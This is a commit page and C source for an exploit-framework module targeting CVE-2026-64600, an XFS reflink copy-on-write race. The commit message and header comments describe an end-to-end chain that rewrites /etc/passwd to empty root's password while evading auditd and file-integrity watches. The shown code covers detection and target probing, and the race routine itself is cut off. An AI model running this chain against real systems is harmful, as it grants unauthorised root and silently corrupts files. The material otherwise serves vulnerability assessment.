5c18b678a5
build / build (clang / debug) (push) Waiting to run
build / build (clang / default) (push) Waiting to run
build / build (gcc / debug) (push) Waiting to run
build / build (gcc / default) (push) Waiting to run
build / sanitizers (ASan + UBSan) (push) Waiting to run
build / clang-tidy (push) Waiting to run
build / drift-check (CISA KEV + Debian tracker) (push) Waiting to run
build / static-build (push) Waiting to run
Promotes refluxfs (CVE-2026-64600) to a 🟢 full-chain module. VM-verified end-to-end on Rocky Linux 9.8 / 5.14.0-687.10.1.el9_8.0.1.x86_64 under qemu/KVM, unprivileged uid=1000, SELinux Enforcing: skeletonkey --exploit refluxfs --i-know --full-chain reflink-clones /etc/passwd, races the CoW window (32 writers / 8 helpers), strips root's password field on-disk (root❌ -> root::, the public PoC's technique), evicts the stale page cache, verifies via O_DIRECT and returns EXPLOIT_OK. `su root` (empty password) then gives uid 0. 3/3 wins on a private-extent target (1244/3716/7913 rounds, 4-30s). Safety properties (this bug rewrites the block device permanently, unlike the page-cache 🟢 modules): - Crafts the payload FIRST and refuses unless it can preserve both root and the invoking user's line; every other passwd line is kept byte-for-byte. A tail-truncating port drops sshd/nobody/the caller and bricks login (hit exactly this during development). - Backs /etc/passwd up before the race; restores on failure; cleanup() restores it (run as root after the pop). - Destructive path gated behind --full-chain. Plain --exploit / --auto run only the safe own-files trigger (EXPLOIT_FAIL), unchanged. Exploitability constraint discovered during verification (NOT in the Qualys writeup): the race only fires when the target's extent is PRIVATE going in. The block starts at refcount 2 (target + attacker clone), the concurrent CoW drops it to 1, and the stale writer reads "1 -> private". A file already reflink-shared with a third file keeps a post-CoW refcount > 1 and is NOT attackable via that target. Stock Rocky 9 ships /etc/passwd pre-shared and was unattackable across ~41,000 rounds; rewriting it to a private extent (byte-identical content, as any useradd/passwd/vipw does) made it fall in ~2,000 rounds. So the exploitable state is the normal administered state. Also fixed a page-cache staleness bug in the win path: the overwrite bypasses the target inode, so its clean cached pages are never invalidated and a buffered read (getpwnam in `su`, or the module's own verify) would see the OLD passwd. The module now issues POSIX_FADV_DONTNEED on a win and verifies via O_DIRECT. detect() --active gains a per-target extent-privacy check: it reports whether /etc/passwd is private (attackable) or already-shared (not). 88-test unit harness still green (148 total). Docs updated: MODULE.md (full-chain flow, private-extent precondition, verification tables), NOTICE.md, CVES.md (🟢 + tier/ops tables), README (15 full-chain / 13 primitive; lands-root list), RELEASE_NOTES, targets.yaml. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_0118iUgHY44hdRtANgyCmu7y
1569 lines
76 KiB
C
1569 lines
76 KiB
C
/*
|
|
* refluxfs_cve_2026_64600 — SKELETONKEY module
|
|
*
|
|
* CVE-2026-64600 — "RefluXFS", a time-of-check/time-of-use race in the XFS
|
|
* reflink copy-on-write path (fs/xfs/xfs_iomap.c :: xfs_direct_write_iomap_begin
|
|
* → fs/xfs/xfs_reflink.c :: xfs_reflink_allocate_cow / xfs_reflink_fill_cow_hole
|
|
* / xfs_find_trim_cow_extent). A direct-I/O writer reads the data-fork extent
|
|
* map under ILOCK, then DROPS ILOCK to allocate a transaction (i.e. to wait for
|
|
* log space). On re-acquiring the lock it re-queries the refcount btree at the
|
|
* ORIGINAL physical block number (imap->br_startblock) and never re-reads the
|
|
* data fork. A second O_DIRECT writer — holding only the coarser IOLOCK — can
|
|
* complete an entire CoW cycle in that window (allocate block Y, write it,
|
|
* remap via xfs_reflink_end_cow), leaving the first writer's imap pointing at a
|
|
* block that is now owned solely by the reflink SOURCE. The stale lookup returns
|
|
* refcount == 1, the writer concludes the block is private, and writes to it in
|
|
* place — landing attacker data on the source file's on-disk blocks.
|
|
*
|
|
* The primitive is therefore NOT memory corruption: it is an arbitrary
|
|
* overwrite of the on-disk contents of any file the attacker can READ on a
|
|
* reflink-enabled XFS volume. That has three consequences worth stating plainly,
|
|
* because they drive every design decision below:
|
|
* 1. No KASLR/SMEP/SMAP/offsets/ROP are involved, so there is nothing to
|
|
* port per kernel build and no --full-chain offset table entry to fill.
|
|
* Qualys notes SELinux enforcing, container boundaries and seccomp are all
|
|
* equally irrelevant.
|
|
* 2. The write is applied UNDER the victim inode. No write(2) is ever issued
|
|
* against it, so its mtime/ctime/size do not change — file-integrity
|
|
* monitoring and `-w /etc/passwd -p wa` auditd watches DO NOT FIRE. See
|
|
* the detection-rule commentary at the bottom of this file.
|
|
* 3. The corruption is persistent on disk and survives reboot.
|
|
* The public demonstration (RHEL 10.2) reflink-clones /etc/passwd into /var/tmp,
|
|
* races concurrent direct-I/O writes against the clone, and thereby rewrites
|
|
* /etc/passwd itself to strip root's password → `su` → root.
|
|
*
|
|
* Reachable by ANY unprivileged local user: no capability, no user namespace,
|
|
* no crafted/mountable filesystem image, no special CONFIG beyond CONFIG_XFS_FS
|
|
* built with reflink. The only preconditions are an XFS filesystem mounted with
|
|
* reflink=1 (the mkfs.xfs default since xfsprogs 5.1) that the user can write
|
|
* to, plus read access to whatever file is being targeted. That makes the
|
|
* exposed population distro-shaped rather than kernel-shaped: RHEL 8/9/10,
|
|
* CentOS Stream 8/9/10, Rocky/AlmaLinux 8/9/10, Oracle Linux 8/9/10 (RHCK +
|
|
* UEK), CloudLinux 8/9/10, Fedora Server >= 31 and Amazon Linux 2023 (plus AL2
|
|
* AMIs from 2022-12) ship XFS+reflink by DEFAULT and are exploitable out of the
|
|
* box; Debian, Ubuntu, Fedora Workstation, SLES, openSUSE and Arch default to
|
|
* ext4/btrfs and are NOT reachable unless an XFS volume was added deliberately.
|
|
* RHEL/CentOS 7 was never affected (kernel 3.10 predates reflink entirely).
|
|
*
|
|
* Introduced in 4.11 (2017-02, commit 3c68d44a2b49 "xfs: allocate direct I/O
|
|
* COW blocks in iomap_begin") — a nine-year exposure window. Fixed by
|
|
* 2f4acd0fcd862e22eab45690ec2c08c80b6ef2e7 ("xfs: resample the data fork
|
|
* mapping after cycling ILOCK"), merged 2026-07-16 for 7.2-rc4; the CNA record
|
|
* lists stable backports 7.1.4 / 6.18.39 / 6.12.96 (commits e705d81a7193,
|
|
* 206c09b04dc5, 44f891bc0889). Class is CWE-362 (race) yielding CWE-367
|
|
* (TOCTOU); NVD had published neither a CWE nor a CVSS vector at time of
|
|
* writing, and the CVE is NOT in CISA KEV (disclosed 2026-07-22). Discovered by
|
|
* the Qualys Threat Research Unit; the advisory credits model-assisted kernel
|
|
* analysis done with Anthropic. See NOTICE.md.
|
|
*
|
|
* STATUS: 🟢 FULL CHAIN (--full-chain), 🟡 safe trigger by default —
|
|
* VM-VERIFIED end-to-end. Confirmed 2026-07-23 on Rocky Linux 9.8 /
|
|
* 5.14.0-687.10.1.el9_8.0.1.x86_64 (stock installer layout: root on XFS with
|
|
* reflink=1) under qemu/KVM, 6 vCPUs.
|
|
*
|
|
* `--exploit refluxfs --i-know --full-chain` lands root end-to-end: it
|
|
* reflink-clones /etc/passwd, races the CoW window, strips root's password
|
|
* field on-disk (root:x: -> root::, the public PoC's technique), evicts the
|
|
* stale page cache, and returns EXPLOIT_OK. `su root` (empty password) then
|
|
* gives uid 0. Verified 3/3 wins on a private-extent target — 1244 / 3716 /
|
|
* 7913 rounds, 4-30s inside a 90s budget — as unprivileged uid=1000 under
|
|
* SELinux Enforcing. Every other passwd line is preserved byte-for-byte
|
|
* (a naive tail-truncating port bricks sshd/login); the target is backed up
|
|
* first and restored on any failure, and cleanup() restores it (run as root
|
|
* after the pop). detect() returns VULNERABLE, the --active FICLONE witness
|
|
* confirms reflink, and it reports whether /etc/passwd's extent is private
|
|
* (attackable) or already-shared (not — see below).
|
|
*
|
|
* EXPLOITABILITY CONSTRAINT (found during verification, not in the Qualys
|
|
* writeup): the race only fires when the target's extent refcount is exactly
|
|
* the attacker-clone pair, i.e. the target's extent must be PRIVATE going in.
|
|
* A file that is ALREADY reflink-shared with a third file keeps a post-CoW
|
|
* refcount > 1 and is NOT attackable via that target. Some fresh cloud images
|
|
* ship /etc/passwd pre-shared; normal admin churn (useradd/passwd/vipw)
|
|
* rewrites it into a private, exploitable extent. detect() --active checks
|
|
* and reports this per target.
|
|
*
|
|
* Without --full-chain the module runs a SAFE reachability trigger only,
|
|
* confined to two files the caller owns, returning EXPLOIT_FAIL and touching
|
|
* no file it does not own. That trigger was itself VM-confirmed reachable
|
|
* (FIEMAP_EXTENT_SHARED + O_DIRECT) and is deliberately under-driven (8
|
|
* writers / 2 helpers / 2s) so it never grinds toward a win on a production
|
|
* box — a non-win from it must never be read as "patched".
|
|
* refluxfs_exploit_safe() forks an isolated child that works ONLY inside a
|
|
* private scratch directory it creates on an XFS mount, on two files it owns,
|
|
* in two phases:
|
|
* (A) DETERMINISTIC + SAFE — writes a donor file, FICLONE-clones it, and
|
|
* confirms via FIEMAP that the clone's extent carries
|
|
* FIEMAP_EXTENT_SHARED. That is a direct, read-only observation that
|
|
* the refcount-btree state the bug misjudges (refcount > 1 on a shared
|
|
* extent) actually exists on this filesystem, and that O_DIRECT opens
|
|
* succeed — i.e. the vulnerable path is reachable here. Reflink cloning
|
|
* is an ordinary supported operation; this phase is safe on any kernel.
|
|
* (B) HARD-BOUNDED window exercise — races a small number of concurrent
|
|
* O_DIRECT writes against the clone while helper threads cycle
|
|
* ftruncate/fdatasync to keep the ILOCK dropping for log space, then
|
|
* STOPS. It then reads the DONOR back with O_DIRECT (bypassing the page
|
|
* cache, which would otherwise hide the corruption) and reports whether
|
|
* the donor's on-disk bytes changed — the honest, self-contained
|
|
* witness that the race was won.
|
|
* The safe trigger is deliberately UNDER-DRIVEN relative to the public PoC
|
|
* (8 writers vs 32, 2 helpers vs 8, 2s cap) and NEVER clones or targets a
|
|
* file it does not own; the destructive /etc/passwd overwrite lives only in
|
|
* the --full-chain path above. Returns EXPLOIT_FAIL; it never claims root it
|
|
* did not get.
|
|
*
|
|
* Note the asymmetry with the corpus's other reconstructed race triggers: a
|
|
* won race here corrupts file DATA, not kernel memory, so unlike bad_epoll
|
|
* (frees a live struct file) and ghostlock (kernel-stack UAF → near-arbitrary
|
|
* write → panic) there is no oops, no silent kernel destabilisation and no
|
|
* panic risk — the worst case is a rewritten file (backed up + restorable),
|
|
* never a downed box. That is why this ranks well above them in --auto
|
|
* safety.
|
|
*
|
|
* detect() is a version gate AND a real precondition probe, because unlike a
|
|
* pure kernel race this bug's reachability is observable safely: it requires
|
|
* a writable directory on a mounted XFS filesystem (checked via statfs(2)
|
|
* f_type == XFS_SUPER_MAGIC — NOT merely "FICLONE works", since btrfs also
|
|
* implements FICLONE and is not affected). Without one it returns
|
|
* PRECOND_FAIL, which is the correct verdict on a default Debian/Ubuntu host.
|
|
* Under --active it additionally performs the FICLONE witness to confirm
|
|
* reflink=1 rather than assuming the mkfs default. Override the probe with
|
|
* SKELETONKEY_XFS_ASSUME_REFLINK=1 (force reachable) / 0 (force unreachable)
|
|
* when you know the fleet's storage layout better than a local probe can —
|
|
* this also drives the unit tests.
|
|
*
|
|
* Honesty caveat, and it is a big one for this CVE specifically: the affected
|
|
* population is overwhelmingly RHEL-family, and those vendors backport fixes
|
|
* WITHOUT bumping the upstream base version (a patched RHEL 8 kernel still
|
|
* reports 4.18.0-xxx.el8). An upstream-version gate cannot see that, so on
|
|
* rpm-family hosts a VULNERABLE verdict is a statement about the upstream
|
|
* base version only; detect() says so explicitly rather than pretending
|
|
* otherwise. Confirm against the vendor erratum (RHSA/ELSA/ALSA/RLSA).
|
|
*
|
|
* arch_support: any — trigger and real-world exploitation are both pure
|
|
* syscall/filesystem work (FICLONE, O_DIRECT pwrite, ftruncate, fdatasync)
|
|
* with no offsets, no shellcode and no arch-specific structure layouts.
|
|
*/
|
|
|
|
#include "skeletonkey_modules.h"
|
|
#include "../../core/registry.h"
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <stdbool.h>
|
|
#include <unistd.h>
|
|
|
|
#ifdef __linux__
|
|
|
|
#include "../../core/kernel_range.h"
|
|
#include "../../core/host.h"
|
|
|
|
#include <stdint.h>
|
|
#include <stdatomic.h>
|
|
#include <dirent.h>
|
|
#include <errno.h>
|
|
#include <fcntl.h>
|
|
#include <limits.h>
|
|
#include <pthread.h>
|
|
#include <pwd.h>
|
|
#include <sched.h>
|
|
#include <time.h>
|
|
#include <sys/ioctl.h>
|
|
#include <sys/stat.h>
|
|
#include <sys/statfs.h>
|
|
#include <sys/types.h>
|
|
#include <sys/wait.h>
|
|
|
|
/* Filesystem/ioctl constants — defined defensively. <linux/fs.h> and
|
|
* <linux/fiemap.h> are not present on every build host and can clash with
|
|
* libc headers; the numbers below are stable uapi. */
|
|
#ifndef XFS_SUPER_MAGIC
|
|
#define XFS_SUPER_MAGIC 0x58465342 /* "XFSB" */
|
|
#endif
|
|
#ifndef RFX_FICLONE
|
|
#define RFX_FICLONE _IOW(0x94, 9, int)
|
|
#endif
|
|
#define RFX_FIEMAP_FLAG_SYNC 0x00000001u
|
|
#define RFX_FIEMAP_EXTENT_SHARED 0x00002000u /* extent is shared: refcount > 1 */
|
|
|
|
/* struct fiemap / struct fiemap_extent, mirrored so we can build the
|
|
* FS_IOC_FIEMAP ioctl number without the kernel header. The _IOWR size field
|
|
* MUST equal sizeof(struct fiemap) == 32, asserted below. */
|
|
struct rfx_fiemap_hdr {
|
|
uint64_t fm_start;
|
|
uint64_t fm_length;
|
|
uint32_t fm_flags;
|
|
uint32_t fm_mapped_extents;
|
|
uint32_t fm_extent_count;
|
|
uint32_t fm_reserved;
|
|
};
|
|
struct rfx_fiemap_extent {
|
|
uint64_t fe_logical;
|
|
uint64_t fe_physical;
|
|
uint64_t fe_length;
|
|
uint64_t fe_reserved64[2];
|
|
uint32_t fe_flags;
|
|
uint32_t fe_reserved[3];
|
|
};
|
|
_Static_assert(sizeof(struct rfx_fiemap_hdr) == 32,
|
|
"fiemap header must be 32 bytes or FS_IOC_FIEMAP encodes wrong");
|
|
_Static_assert(sizeof(struct rfx_fiemap_extent) == 56,
|
|
"fiemap extent must be 56 bytes to match uapi layout");
|
|
|
|
#define RFX_FIEMAP_MAX_EXTENTS 8
|
|
struct rfx_fiemap_req {
|
|
struct rfx_fiemap_hdr hdr;
|
|
struct rfx_fiemap_extent ext[RFX_FIEMAP_MAX_EXTENTS];
|
|
};
|
|
#define RFX_FS_IOC_FIEMAP _IOWR('f', 11, struct rfx_fiemap_hdr)
|
|
|
|
/* ------------------------------------------------------------------
|
|
* Kernel-range table. Mainline fix 2f4acd0fcd86 landed in 7.2-rc4
|
|
* (merged 2026-07-16); the CNA record lists stable backports on the three
|
|
* branches below. A branch with an exact entry is patched iff
|
|
* host.patch >= entry.patch; any branch strictly newer than EVERY entry
|
|
* (i.e. 7.2+) inherits the mainline fix; every other branch — the 6.6 / 6.1 /
|
|
* 5.15 / 5.14 / 5.10 / 4.19 / 4.18 LTS lines and the EOL branches in between —
|
|
* is still vulnerable with no upstream stable fix published at time of writing.
|
|
* kernel_range_is_patched() implements exactly that.
|
|
*
|
|
* Distro vendor branches (RHEL 4.18.0-*.el8, 5.14.0-*.el9, UEK, Amazon) carry
|
|
* the fix without moving these numbers; see the rpm-family caveat in detect().
|
|
* Extend the table as more branches publish backports — tools/
|
|
* refresh-kernel-ranges.py flags the drift. Authoritative source: the Linux
|
|
* kernel CNA record (git.kernel.org/stable/c/<hash>).
|
|
* ------------------------------------------------------------------ */
|
|
static const struct kernel_patched_from refluxfs_patched_branches[] = {
|
|
{6, 12, 96}, /* 6.12 LTS — 44f891bc0889 */
|
|
{6, 18, 39}, /* 6.18 — 206c09b04dc5 */
|
|
{7, 1, 4}, /* 7.1 — e705d81a7193; 7.2+ inherits mainline 2f4acd0fcd86 */
|
|
};
|
|
|
|
static const struct kernel_range refluxfs_range = {
|
|
.patched_from = refluxfs_patched_branches,
|
|
.n_patched_from = sizeof(refluxfs_patched_branches) /
|
|
sizeof(refluxfs_patched_branches[0]),
|
|
};
|
|
|
|
/* ------------------------------------------------------------------
|
|
* Target discovery: a writable directory on a mounted XFS filesystem.
|
|
*
|
|
* We check the SUPERBLOCK MAGIC rather than trusting a successful FICLONE,
|
|
* because btrfs implements FICLONE too and is not affected by this CVE. The
|
|
* candidate list covers the conventional scratch dirs (the public PoC used
|
|
* /var/tmp) and then anything XFS that /proc/mounts reports, which catches
|
|
* layouts where only /home or a data volume is XFS.
|
|
* ------------------------------------------------------------------ */
|
|
|
|
#define RFX_SCRATCH_PREFIX "skeletonkey-refluxfs-"
|
|
|
|
/* Buffer tiers. Directory buffers are deliberately smaller than the PATH_MAX
|
|
* file-path buffers built from them, so every snprintf() below is provably
|
|
* non-truncating (and -Wformat-truncation stays quiet without pragmas):
|
|
* mount dir (<=1023) + "/" + prefix + "XXXXXX" fits RFX_SCRATCH_MAX
|
|
* scratch (<=2047) + "/donor"|"/clone" fits PATH_MAX
|
|
* mount dir (<=1023) + "/" + d_name (<=255) fits PATH_MAX */
|
|
#define RFX_DIR_MAX 1024 /* an XFS mountpoint / scratch parent */
|
|
#define RFX_SCRATCH_MAX 2048 /* the private mkdtemp() directory */
|
|
|
|
static bool rfx_dir_is_writable_xfs(const char *dir)
|
|
{
|
|
if (!dir || !*dir) return false;
|
|
struct statfs sfs;
|
|
if (statfs(dir, &sfs) != 0) return false;
|
|
if ((unsigned long)sfs.f_type != (unsigned long)XFS_SUPER_MAGIC) return false;
|
|
return access(dir, W_OK | X_OK) == 0;
|
|
}
|
|
|
|
/* Append every xfs mountpoint in /proc/mounts to the caller's candidate
|
|
* callback. Mountpoints are octal-escaped in that file; we unescape the
|
|
* cases that actually occur (\040 space, \011 tab, \012 newline, \134 \). */
|
|
static void rfx_unescape_mount(char *s)
|
|
{
|
|
char *r = s, *w = s;
|
|
while (*r) {
|
|
if (r[0] == '\\' && r[1] && r[2] && r[3]) {
|
|
int a = r[1] - '0', b = r[2] - '0', c = r[3] - '0';
|
|
if (a >= 0 && a <= 7 && b >= 0 && b <= 7 && c >= 0 && c <= 7) {
|
|
*w++ = (char)((a << 6) | (b << 3) | c);
|
|
r += 4;
|
|
continue;
|
|
}
|
|
}
|
|
*w++ = *r++;
|
|
}
|
|
*w = '\0';
|
|
}
|
|
|
|
/* Find a writable directory on an XFS filesystem.
|
|
*
|
|
* Returns 1 and fills `out` when a usable target exists, 0 when none does.
|
|
* *assumed is set true when the answer came from SKELETONKEY_XFS_ASSUME_REFLINK
|
|
* rather than a real statfs() match, so callers can report the difference
|
|
* honestly instead of implying they measured something they did not. */
|
|
static int rfx_find_xfs_dir(char *out, size_t outsz, bool *assumed)
|
|
{
|
|
if (assumed) *assumed = false;
|
|
if (out && outsz) out[0] = '\0';
|
|
|
|
const char *ov = getenv("SKELETONKEY_XFS_ASSUME_REFLINK");
|
|
if (ov && *ov == '0') {
|
|
if (assumed) *assumed = true;
|
|
return 0; /* operator asserts: no reflink XFS here */
|
|
}
|
|
|
|
const char *fixed[] = {
|
|
getenv("TMPDIR"), "/var/tmp", "/tmp", getenv("HOME"),
|
|
};
|
|
for (size_t i = 0; i < sizeof(fixed) / sizeof(fixed[0]); i++) {
|
|
if (fixed[i] && rfx_dir_is_writable_xfs(fixed[i])) {
|
|
snprintf(out, outsz, "%s", fixed[i]);
|
|
return 1;
|
|
}
|
|
}
|
|
|
|
/* Anything else XFS that we can write to. */
|
|
FILE *f = fopen("/proc/mounts", "re");
|
|
if (f) {
|
|
char line[1024];
|
|
while (fgets(line, sizeof line, f)) {
|
|
char dev[256], mp[512], fstype[64];
|
|
if (sscanf(line, "%255s %511s %63s", dev, mp, fstype) != 3) continue;
|
|
if (strcmp(fstype, "xfs") != 0) continue;
|
|
rfx_unescape_mount(mp);
|
|
if (rfx_dir_is_writable_xfs(mp)) {
|
|
snprintf(out, outsz, "%s", mp);
|
|
fclose(f);
|
|
return 1;
|
|
}
|
|
}
|
|
fclose(f);
|
|
}
|
|
|
|
if (ov && *ov == '1') {
|
|
/* Operator asserts the target exists even though we could not see it
|
|
* (e.g. scanning a fleet from a host whose own storage differs).
|
|
* Hand back a conventional scratch dir; exploit() reports honestly if
|
|
* it turns out not to be usable. */
|
|
snprintf(out, outsz, "%s", "/var/tmp");
|
|
if (assumed) *assumed = true;
|
|
return 1;
|
|
}
|
|
return 0;
|
|
}
|
|
|
|
/* Non-destructive reflink witness: clone a 4 KiB file inside `dir` and remove
|
|
* both files immediately. Returns 1 if FICLONE succeeded (reflink=1 confirmed),
|
|
* 0 if the filesystem refused it (reflink=0 → the CoW path is unreachable),
|
|
* -1 if we could not decide. Only called when ctx->active_probe is set. */
|
|
static int rfx_reflink_witness(const char *dir)
|
|
{
|
|
/* pid-qualified so two concurrent skeletonkey runs (a fleet scan looping
|
|
* over hosts, or --auto's forked per-module detects) cannot unlink each
|
|
* other's probe files mid-check and produce a bogus PRECOND_FAIL. */
|
|
char src[PATH_MAX], dst[PATH_MAX];
|
|
snprintf(src, sizeof src, "%s/" RFX_SCRATCH_PREFIX "probe.%ld.src",
|
|
dir, (long)getpid());
|
|
snprintf(dst, sizeof dst, "%s/" RFX_SCRATCH_PREFIX "probe.%ld.dst",
|
|
dir, (long)getpid());
|
|
|
|
int rc = -1;
|
|
int sfd = open(src, O_RDWR | O_CREAT | O_TRUNC, 0600);
|
|
if (sfd < 0) return -1;
|
|
|
|
static const char blk[4096] = { 0 };
|
|
if (write(sfd, blk, sizeof blk) != (ssize_t)sizeof blk) { close(sfd); unlink(src); return -1; }
|
|
(void)fsync(sfd);
|
|
|
|
int dfd = open(dst, O_RDWR | O_CREAT | O_TRUNC, 0600);
|
|
if (dfd >= 0) {
|
|
errno = 0;
|
|
if (ioctl(dfd, RFX_FICLONE, sfd) == 0) {
|
|
rc = 1;
|
|
} else if (errno == EOPNOTSUPP || errno == EINVAL || errno == EXDEV ||
|
|
errno == ENOTTY) {
|
|
rc = 0; /* filesystem has no reflink support */
|
|
}
|
|
close(dfd);
|
|
unlink(dst);
|
|
}
|
|
close(sfd);
|
|
unlink(src);
|
|
return rc;
|
|
}
|
|
|
|
static int rfx_extent_is_shared(const char *path);
|
|
static const char *rfx_fc_target(void);
|
|
|
|
static skeletonkey_result_t refluxfs_detect(const struct skeletonkey_ctx *ctx)
|
|
{
|
|
const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
|
|
if (!v || v->major == 0) {
|
|
if (!ctx->json)
|
|
fprintf(stderr, "[!] refluxfs: host fingerprint missing kernel "
|
|
"version — bailing\n");
|
|
return SKELETONKEY_TEST_ERROR;
|
|
}
|
|
|
|
/* Direct-I/O CoW block allocation in iomap_begin — the code the race lives
|
|
* in — arrived in 4.11 (3c68d44a2b49). RHEL/CentOS 7's 3.10 predates
|
|
* reflink entirely and was never affected. */
|
|
if (!skeletonkey_host_kernel_at_least(ctx->host, 4, 11, 0)) {
|
|
if (!ctx->json)
|
|
fprintf(stderr, "[i] refluxfs: kernel %s predates XFS direct-I/O CoW "
|
|
"(introduced 4.11) — not affected\n", v->release);
|
|
return SKELETONKEY_OK;
|
|
}
|
|
|
|
/* A patched kernel is not vulnerable regardless of storage layout —
|
|
* decide that first so the verdict is deterministic. */
|
|
if (kernel_range_is_patched(&refluxfs_range, v)) {
|
|
if (!ctx->json)
|
|
fprintf(stderr, "[+] refluxfs: kernel %s is patched (>= 7.1.4 / "
|
|
"6.18.39 / 6.12.96 on-branch, or 7.2+ mainline)\n",
|
|
v->release);
|
|
return SKELETONKEY_OK;
|
|
}
|
|
|
|
/* Vulnerable kernel. The bug is only reachable where an XFS filesystem
|
|
* with reflink is mounted and writable — on a default Debian/Ubuntu host
|
|
* (ext4) there is nothing to attack, and that is PRECOND_FAIL, not
|
|
* VULNERABLE. */
|
|
char dir[RFX_DIR_MAX];
|
|
bool assumed = false;
|
|
if (!rfx_find_xfs_dir(dir, sizeof dir, &assumed)) {
|
|
if (!ctx->json) {
|
|
fprintf(stderr, "[i] refluxfs: kernel %s is in the vulnerable range "
|
|
"but no writable XFS filesystem is mounted%s — the "
|
|
"reflink CoW path is not reachable here\n",
|
|
v->release,
|
|
assumed ? " (forced by SKELETONKEY_XFS_ASSUME_REFLINK=0)" : "");
|
|
fprintf(stderr, "[i] refluxfs: XFS+reflink is the default on RHEL/"
|
|
"CentOS/Rocky/Alma/Oracle 8-10, Fedora Server >= 31 "
|
|
"and Amazon Linux 2023; if this fleet has XFS "
|
|
"elsewhere, re-run with "
|
|
"SKELETONKEY_XFS_ASSUME_REFLINK=1\n");
|
|
}
|
|
return SKELETONKEY_PRECOND_FAIL;
|
|
}
|
|
|
|
/* Under --active, confirm reflink is actually enabled rather than assuming
|
|
* the mkfs.xfs default. reflink=0 means no shared extents can exist, so the
|
|
* refcount check the bug fumbles is never reached. */
|
|
if (ctx->active_probe && !assumed) {
|
|
int w = rfx_reflink_witness(dir);
|
|
if (w == 0) {
|
|
if (!ctx->json)
|
|
fprintf(stderr, "[i] refluxfs: XFS at %s has reflink DISABLED "
|
|
"(FICLONE refused) — no shared extents possible, "
|
|
"bug not reachable here\n", dir);
|
|
return SKELETONKEY_PRECOND_FAIL;
|
|
}
|
|
if (w == 1 && !ctx->json)
|
|
fprintf(stderr, "[+] refluxfs: reflink CONFIRMED on XFS at %s "
|
|
"(FICLONE accepted)\n", dir);
|
|
if (w < 0 && !ctx->json)
|
|
fprintf(stderr, "[i] refluxfs: reflink probe inconclusive at %s — "
|
|
"falling back to the version verdict\n", dir);
|
|
|
|
/* Exploitability of the canonical target hinges on its extent being
|
|
* PRIVATE: the race only fires when the post-CoW refcount drops to 1,
|
|
* so a file already reflink-shared with a third file is NOT attackable
|
|
* via that target (some fresh cloud images ship /etc/passwd pre-shared).
|
|
* This is a per-target read-only check; a private extent is the
|
|
* exploitable state that normal admin churn (useradd/passwd/vipw)
|
|
* produces. */
|
|
const char *fct = rfx_fc_target();
|
|
int sh = rfx_extent_is_shared(fct);
|
|
if (!ctx->json) {
|
|
if (sh == 0)
|
|
fprintf(stderr, "[+] refluxfs: full-chain target %s has a PRIVATE "
|
|
"extent — the race can fire against it (--exploit "
|
|
"refluxfs --i-know --full-chain)\n", fct);
|
|
else if (sh == 1)
|
|
fprintf(stderr, "[!] refluxfs: full-chain target %s is ALREADY "
|
|
"reflink-shared — its post-CoW refcount stays > 1, "
|
|
"so it is NOT attackable via that target (other "
|
|
"private-extent root files may still be). See "
|
|
"MODULE.md.\n", fct);
|
|
}
|
|
}
|
|
|
|
if (!ctx->json) {
|
|
fprintf(stderr, "[!] refluxfs: VULNERABLE — kernel %s below the fix on "
|
|
"its branch, writable XFS at %s%s; the reflink CoW "
|
|
"ILOCK-cycling race lets any unprivileged user overwrite "
|
|
"the on-disk contents of any readable file (no userns, "
|
|
"no capability, no offsets)\n",
|
|
v->release, dir,
|
|
assumed ? " (asserted via SKELETONKEY_XFS_ASSUME_REFLINK=1)"
|
|
: "");
|
|
if (!ctx->active_probe)
|
|
fprintf(stderr, "[i] refluxfs: reflink=1 assumed (the mkfs.xfs "
|
|
"default since xfsprogs 5.1) — re-run with --active "
|
|
"to confirm it empirically via FICLONE\n");
|
|
if (ctx->host && ctx->host->is_rpm_family)
|
|
fprintf(stderr, "[!] refluxfs: rpm-family host — RHEL/Oracle/Rocky/"
|
|
"Alma backport this fix WITHOUT bumping the upstream "
|
|
"version (a patched el8 kernel still reports "
|
|
"4.18.0-*), so this verdict reflects the upstream "
|
|
"base version only. Confirm against the vendor "
|
|
"erratum (RHSA/ELSA/ALSA/RLSA).\n");
|
|
fprintf(stderr, "[i] refluxfs: no runtime mitigation exists — reflink is "
|
|
"a superblock feature that cannot be turned off on a "
|
|
"live filesystem, and O_DIRECT cannot be disabled. Patch "
|
|
"the kernel and reboot.\n");
|
|
}
|
|
return SKELETONKEY_VULNERABLE;
|
|
}
|
|
|
|
/* ------------------------------------------------------------------
|
|
* Reconstructed reachability trigger (deliberately under-driven, and
|
|
* deliberately confined to files we own).
|
|
*
|
|
* Shape of the public PoC, minus the part that makes it an attack:
|
|
* PoC: FICLONE /etc/passwd -> /var/tmp/clone; 32 x O_DIRECT 4K write @0
|
|
* + 8 x ftruncate/fdatasync helpers => /etc/passwd rewritten on disk
|
|
* here: FICLONE ourdonor -> ourclone; 8 x O_DIRECT 4K write @0
|
|
* + 2 x ftruncate/fdatasync helpers => at worst OUR donor is rewritten
|
|
*
|
|
* Phase A confirms, read-only and deterministically, that the exact filesystem
|
|
* state the bug misjudges exists here: a shared extent (FIEMAP_EXTENT_SHARED,
|
|
* i.e. refcount > 1) and a working O_DIRECT path into
|
|
* xfs_direct_write_iomap_begin. Phase B races writers against the clone while
|
|
* helpers cycle ftruncate/fdatasync to keep the transaction allocator dropping
|
|
* ILOCK to wait for log space — the window the race needs — then stops and
|
|
* checks the donor's on-disk bytes with an O_DIRECT read (a buffered read would
|
|
* be served from the donor's page cache, which the corruption bypasses, and
|
|
* would hide a win).
|
|
*
|
|
* We do NOT clone or target any file we do not own, do NOT grind the race to a
|
|
* win, and do NOT touch /etc/passwd or any other system file. A won race here
|
|
* damages 4 KiB of our own scratch file and nothing else.
|
|
* ------------------------------------------------------------------ */
|
|
#define RFX_BLK 4096u /* 4 KiB — the PoC's write size */
|
|
#define RFX_ALIGN 4096u /* satisfies 512b and 4Kn O_DIRECT alignment */
|
|
#define RFX_DONOR_BYTE 0x5a /* 'Z' — donor's known-good pattern */
|
|
#define RFX_ATTACKER_BYTE 0x41 /* 'A' — what the racing writers push */
|
|
#define RFX_RACE_WRITERS 8 /* public PoC uses 32 */
|
|
#define RFX_RACE_HELPERS 2 /* public PoC uses 8 */
|
|
#define RFX_RACE_ROUNDS 16 /* hard iteration cap */
|
|
#define RFX_RACE_BUDGET_SECS 2 /* hard wall-clock cap */
|
|
|
|
